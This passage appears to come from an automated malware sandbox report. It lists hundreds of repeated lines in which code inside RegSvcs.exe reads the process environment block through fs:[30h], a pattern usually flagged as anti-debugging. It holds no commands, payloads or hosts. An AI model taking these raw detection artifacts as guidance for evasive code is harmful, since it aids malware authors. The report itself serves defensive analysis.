            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150E5E7 mov eax, dword ptr fs:[00000030h]6_2_0150E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C5ED mov eax, dword ptr fs:[00000030h]6_2_0151C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C5ED mov eax, dword ptr fs:[00000030h]6_2_0151C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E2582 mov eax, dword ptr fs:[00000030h]6_2_014E2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E2582 mov ecx, dword ptr fs:[00000030h]6_2_014E2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E59C mov eax, dword ptr fs:[00000030h]6_2_0151E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01514588 mov eax, dword ptr fs:[00000030h]6_2_01514588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015045B1 mov eax, dword ptr fs:[00000030h]6_2_015045B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015045B1 mov eax, dword ptr fs:[00000030h]6_2_015045B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015605A7 mov eax, dword ptr fs:[00000030h]6_2_015605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015605A7 mov eax, dword ptr fs:[00000030h]6_2_015605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015605A7 mov eax, dword ptr fs:[00000030h]6_2_015605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150245A mov eax, dword ptr fs:[00000030h]6_2_0150245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159A456 mov eax, dword ptr fs:[00000030h]6_2_0159A456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D645D mov eax, dword ptr fs:[00000030h]6_2_014D645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151E443 mov eax, dword ptr fs:[00000030h]6_2_0151E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150A470 mov eax, dword ptr fs:[00000030h]6_2_0150A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150A470 mov eax, dword ptr fs:[00000030h]6_2_0150A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0150A470 mov eax, dword ptr fs:[00000030h]6_2_0150A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156C460 mov ecx, dword ptr fs:[00000030h]6_2_0156C460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01518402 mov eax, dword ptr fs:[00000030h]6_2_01518402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01518402 mov eax, dword ptr fs:[00000030h]6_2_01518402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01518402 mov eax, dword ptr fs:[00000030h]6_2_01518402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DC427 mov eax, dword ptr fs:[00000030h]6_2_014DC427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DE420 mov eax, dword ptr fs:[00000030h]6_2_014DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DE420 mov eax, dword ptr fs:[00000030h]6_2_014DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014DE420 mov eax, dword ptr fs:[00000030h]6_2_014DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01566420 mov eax, dword ptr fs:[00000030h]6_2_01566420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E04E5 mov ecx, dword ptr fs:[00000030h]6_2_014E04E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0159A49A mov eax, dword ptr fs:[00000030h]6_2_0159A49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015144B0 mov ecx, dword ptr fs:[00000030h]6_2_015144B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E64AB mov eax, dword ptr fs:[00000030h]6_2_014E64AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156A4B0 mov eax, dword ptr fs:[00000030h]6_2_0156A4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522750 mov eax, dword ptr fs:[00000030h]6_2_01522750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522750 mov eax, dword ptr fs:[00000030h]6_2_01522750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01564755 mov eax, dword ptr fs:[00000030h]6_2_01564755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156E75D mov eax, dword ptr fs:[00000030h]6_2_0156E75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151674D mov esi, dword ptr fs:[00000030h]6_2_0151674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151674D mov eax, dword ptr fs:[00000030h]6_2_0151674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151674D mov eax, dword ptr fs:[00000030h]6_2_0151674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0750 mov eax, dword ptr fs:[00000030h]6_2_014E0750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E8770 mov eax, dword ptr fs:[00000030h]6_2_014E8770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F0770 mov eax, dword ptr fs:[00000030h]6_2_014F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01510710 mov eax, dword ptr fs:[00000030h]6_2_01510710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C700 mov eax, dword ptr fs:[00000030h]6_2_0151C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E0710 mov eax, dword ptr fs:[00000030h]6_2_014E0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155C730 mov eax, dword ptr fs:[00000030h]6_2_0155C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151273C mov eax, dword ptr fs:[00000030h]6_2_0151273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151273C mov ecx, dword ptr fs:[00000030h]6_2_0151273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151273C mov eax, dword ptr fs:[00000030h]6_2_0151273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C720 mov eax, dword ptr fs:[00000030h]6_2_0151C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C720 mov eax, dword ptr fs:[00000030h]6_2_0151C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EC7C0 mov eax, dword ptr fs:[00000030h]6_2_014EC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015607C3 mov eax, dword ptr fs:[00000030h]6_2_015607C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E47FB mov eax, dword ptr fs:[00000030h]6_2_014E47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E47FB mov eax, dword ptr fs:[00000030h]6_2_014E47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156E7E1 mov eax, dword ptr fs:[00000030h]6_2_0156E7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015027ED mov eax, dword ptr fs:[00000030h]6_2_015027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015027ED mov eax, dword ptr fs:[00000030h]6_2_015027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015027ED mov eax, dword ptr fs:[00000030h]6_2_015027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158678E mov eax, dword ptr fs:[00000030h]6_2_0158678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E07AF mov eax, dword ptr fs:[00000030h]6_2_014E07AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015947A0 mov eax, dword ptr fs:[00000030h]6_2_015947A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FC640 mov eax, dword ptr fs:[00000030h]6_2_014FC640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01512674 mov eax, dword ptr fs:[00000030h]6_2_01512674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A660 mov eax, dword ptr fs:[00000030h]6_2_0151A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A660 mov eax, dword ptr fs:[00000030h]6_2_0151A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A866E mov eax, dword ptr fs:[00000030h]6_2_015A866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015A866E mov eax, dword ptr fs:[00000030h]6_2_015A866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F260B mov eax, dword ptr fs:[00000030h]6_2_014F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01522619 mov eax, dword ptr fs:[00000030h]6_2_01522619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E609 mov eax, dword ptr fs:[00000030h]6_2_0155E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E262C mov eax, dword ptr fs:[00000030h]6_2_014E262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014FE627 mov eax, dword ptr fs:[00000030h]6_2_014FE627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01516620 mov eax, dword ptr fs:[00000030h]6_2_01516620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01518620 mov eax, dword ptr fs:[00000030h]6_2_01518620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A6C7 mov ebx, dword ptr fs:[00000030h]6_2_0151A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A6C7 mov eax, dword ptr fs:[00000030h]6_2_0151A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E6F2 mov eax, dword ptr fs:[00000030h]6_2_0155E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E6F2 mov eax, dword ptr fs:[00000030h]6_2_0155E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E6F2 mov eax, dword ptr fs:[00000030h]6_2_0155E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E6F2 mov eax, dword ptr fs:[00000030h]6_2_0155E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015606F1 mov eax, dword ptr fs:[00000030h]6_2_015606F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015606F1 mov eax, dword ptr fs:[00000030h]6_2_015606F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E4690 mov eax, dword ptr fs:[00000030h]6_2_014E4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E4690 mov eax, dword ptr fs:[00000030h]6_2_014E4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015166B0 mov eax, dword ptr fs:[00000030h]6_2_015166B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151C6A6 mov eax, dword ptr fs:[00000030h]6_2_0151C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01560946 mov eax, dword ptr fs:[00000030h]6_2_01560946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01584978 mov eax, dword ptr fs:[00000030h]6_2_01584978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01584978 mov eax, dword ptr fs:[00000030h]6_2_01584978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156C97C mov eax, dword ptr fs:[00000030h]6_2_0156C97C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01506962 mov eax, dword ptr fs:[00000030h]6_2_01506962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01506962 mov eax, dword ptr fs:[00000030h]6_2_01506962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01506962 mov eax, dword ptr fs:[00000030h]6_2_01506962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0152096E mov eax, dword ptr fs:[00000030h]6_2_0152096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0152096E mov edx, dword ptr fs:[00000030h]6_2_0152096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0152096E mov eax, dword ptr fs:[00000030h]6_2_0152096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156C912 mov eax, dword ptr fs:[00000030h]6_2_0156C912
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D8918 mov eax, dword ptr fs:[00000030h]6_2_014D8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014D8918 mov eax, dword ptr fs:[00000030h]6_2_014D8918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E908 mov eax, dword ptr fs:[00000030h]6_2_0155E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0155E908 mov eax, dword ptr fs:[00000030h]6_2_0155E908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156892A mov eax, dword ptr fs:[00000030h]6_2_0156892A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0157892B mov eax, dword ptr fs:[00000030h]6_2_0157892B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015149D0 mov eax, dword ptr fs:[00000030h]6_2_015149D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015AA9D3 mov eax, dword ptr fs:[00000030h]6_2_015AA9D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015769C0 mov eax, dword ptr fs:[00000030h]6_2_015769C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]6_2_014EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]6_2_014EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]6_2_014EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]6_2_014EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]6_2_014EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014EA9D0 mov eax, dword ptr fs:[00000030h]6_2_014EA9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015129F9 mov eax, dword ptr fs:[00000030h]6_2_015129F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015129F9 mov eax, dword ptr fs:[00000030h]6_2_015129F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156E9E0 mov eax, dword ptr fs:[00000030h]6_2_0156E9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E09AD mov eax, dword ptr fs:[00000030h]6_2_014E09AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E09AD mov eax, dword ptr fs:[00000030h]6_2_014E09AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015689B3 mov esi, dword ptr fs:[00000030h]6_2_015689B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015689B3 mov eax, dword ptr fs:[00000030h]6_2_015689B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_015689B3 mov eax, dword ptr fs:[00000030h]6_2_015689B3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F29A0 mov eax, dword ptr fs:[00000030h]6_2_014F29A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01510854 mov eax, dword ptr fs:[00000030h]6_2_01510854
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014F2840 mov ecx, dword ptr fs:[00000030h]6_2_014F2840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E4859 mov eax, dword ptr fs:[00000030h]6_2_014E4859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_014E4859 mov eax, dword ptr fs:[00000030h]6_2_014E4859
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156E872 mov eax, dword ptr fs:[00000030h]6_2_0156E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156E872 mov eax, dword ptr fs:[00000030h]6_2_0156E872
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01576870 mov eax, dword ptr fs:[00000030h]6_2_01576870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01576870 mov eax, dword ptr fs:[00000030h]6_2_01576870
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0156C810 mov eax, dword ptr fs:[00000030h]6_2_0156C810
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0151A830 mov eax, dword ptr fs:[00000030h]6_2_0151A830
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158483A mov eax, dword ptr fs:[00000030h]6_2_0158483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_0158483A mov eax, dword ptr fs:[00000030h]6_2_0158483A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_01502835 mov eax, dword ptr fs:[00000030h]6_2_01502835
